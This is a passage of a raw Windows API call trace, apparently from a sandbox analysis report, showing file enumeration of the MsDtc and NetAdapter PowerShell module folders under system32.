ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x843, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc.Types.ps1xml", cAlternateFileName="")) returned 1 [0177.197] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcc4, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcAdvancedHostSettingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.197] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xef8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcAdvancedSettingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.197] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x635, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcClusterDefaultTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.197] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a48d09b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a48d09b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a48d09b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3ae0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcClusterTMMappingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.198] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a48d09b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a48d09b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a48d09b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x60f, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcDefaultTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.198] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a48d09b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a48d09b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe44, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcLogTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.198] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x154d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcNetworkSettingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.198] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x11ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.198] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTransactionsStatisticsTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.198] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa84, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTransactionsTraceSessionTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.198] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaa4, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTransactionsTraceSettingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.199] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1766, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTransactionTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.199] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6701, dwReserved0=0x0, dwReserved1=0x0, cFileName="TestDtc.psm1", cAlternateFileName="")) returned 1 [0177.199] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0177.199] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0177.200] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.200] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.200] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc", nBufferLength=0x105, lpBuffer=0x1b7de100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc", lpFilePart=0x0) returned 0x38 [0177.200] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de540) returned 1 [0177.200] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\msdtc"), fInfoLevelId=0x0, lpFileInformation=0x1b7de620 | out: lpFileInformation=0x1b7de620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0177.200] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de500) returned 1 [0177.200] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de570) returned 1 [0177.200] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc", nBufferLength=0x105, lpBuffer=0x1b7de060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc", lpFilePart=0x0) returned 0x38 [0177.200] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\", lpFilePart=0x0) returned 0x39 [0177.201] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\*", lpFindFileData=0x1b7de210 | out: lpFindFileData=0x1b7de210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0177.202] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.202] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8fadd5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0177.202] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8fadd5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0177.202] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1961, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc.Formats.ps1xml", cAlternateFileName="")) returned 1 [0177.202] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a48d09b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a48d09b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a48d09b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1006, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc.psd1", cAlternateFileName="")) returned 1 [0177.230] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x843, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc.Types.ps1xml", cAlternateFileName="")) returned 1 [0177.230] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcc4, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcAdvancedHostSettingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.230] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xef8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcAdvancedSettingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.231] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x635, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcClusterDefaultTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.231] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a48d09b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a48d09b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a48d09b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3ae0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcClusterTMMappingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.231] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a48d09b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a48d09b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a48d09b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x60f, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcDefaultTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.231] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a48d09b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a48d09b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe44, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcLogTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.232] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x154d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcNetworkSettingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.232] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x11ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.232] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTransactionsStatisticsTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.232] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa84, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTransactionsTraceSessionTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.232] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaa4, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTransactionsTraceSettingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.232] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1766, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTransactionTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.233] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6701, dwReserved0=0x0, dwReserved1=0x0, cFileName="TestDtc.psm1", cAlternateFileName="")) returned 1 [0177.233] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6701, dwReserved0=0x0, dwReserved1=0x0, cFileName="TestDtc.psm1", cAlternateFileName="")) returned 0 [0177.233] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0177.234] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de4c0) returned 1 [0177.234] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de480) returned 1 [0177.234] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\MsDtc.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\msdtc\\msdtc.psd1")) returned 0x20 [0177.236] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.236] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter", lpFilePart=0x0) returned 0x3d [0177.236] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter\\", lpFilePart=0x0) returned 0x3e [0177.236] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592850 [0177.239] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.240] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2ffb, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.240] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x29ea, 